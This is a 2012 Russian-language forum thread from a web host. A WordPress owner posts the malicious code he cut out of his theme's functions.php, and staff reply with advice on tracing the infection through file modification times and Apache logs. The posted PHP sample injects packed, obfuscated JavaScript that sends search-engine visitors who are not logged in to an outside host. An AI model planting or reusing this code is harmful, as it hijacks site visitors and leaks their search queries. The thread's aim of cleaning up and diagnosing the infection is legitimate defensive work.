• UAH
  • USD
  • RUB
  • EUR
  • +38(044) 392-74-33  Киев
  • +38(057) 728-39-00  Харьков
  • +38(056) 794-38-31  Днепр
  • +38(032) 229-58-93  Львов
  • +38(048) 738-57-70  Одесса
  • +38(093) 449-04-21  Life
  • +38(067) 400-88-44  Киевстар
  • +38(095) 630-90-82  MTC
  • +1(888)393-24-51  USA, Toll free
  • +44(131)507-01-14  Great Britain
  • +7(499) 348-28-61  Москва

CMS WordPress. Вирус JS:Redirector-MR [Trj]

Форумы CMS WordPress Вирус JS:Redirector-MR [Trj]
eleshevich.av
31.01.2012
хостинг: нет
домен: нет
Вирус JS:Redirector-MR [Trj]
Напала вот такая беда JS:Redirector-MR [Trj] аваст среагировал.
видоизменяла файлы в теме шаблола functions.php

(явно мне не припёрло редактировать шаблон в 4 утра)я сравнил изначальный код шаблона и вырезал вот такой кусок (вируса) и постави права на фаил только чтение

<?php
add_action('get_footer', 'add_sscounter');
function add_sscounter(){
echo '<!--scounter-->';
if(function_exists('is_user_logged_in')){
if(time()%2 == 0 && !is_user_logged_in()){
echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>";
}
}
}
?>


где он ещё мог прописаться?
и какие поставить плагины для безопасности? или кто чем поможет?
Илья
31.01.2012
хостинг: есть
домен: есть
Как показывает практика плагины к CMS создают только дополнительные дыры. Те плагины с дырами, про которые мы знаем мы защищаем через настройки виртуального хоста, блокируя использование уязвимости злоумышленниками. В каждом конкретном случае нужно искать источник через который осуществляется заражение. Для этого нужно не трогать зараженный файл, а посмотреть дату его модификации, после чего проанализировать логи Apache за этот период и найти POST запросы, которые были сделаны в это время. Тогда вы сможете найти источник заражения.
eleshevich.av
31.01.2012
хостинг: нет
домен: нет
Илья, спасибо за ответ.
Подскажите как вышеописанное осуществить, писать тикет в техсапорт, мои два сайта были заражены в ночь с 30.01.11 на 31.01.11 (я быстро отреагировал точной даты модификации файла не сохранилось)
Илья
31.01.2012
хостинг: есть
домен: есть
Есть два варианта - самостоятельно решить вопрос, либо написать в техподдержку с пометкой "для антивируса". Но это делать надо до того как вы изменили файл, так как в таком случае найти источник не сможем. Мы просто сейчас пишем небольшой антивирус, который проверяет некоторые распространенные уязвимости плюс есть система, которая определяет версии установленных CMS и закрывает дыры. Конечно гарантировать закрытие всех уязвимостей не можем, но если находим закономерность, то решаем этот вопрос.
Участвовать в общении на этом форуме могут только
зарегистрированные пользователи.

Если вы уже зарегистрированы Вам необходимо войти на форум.

Тема закрыта по истечению срока давности.
Горячая линия
(044)
392 74 33
другие города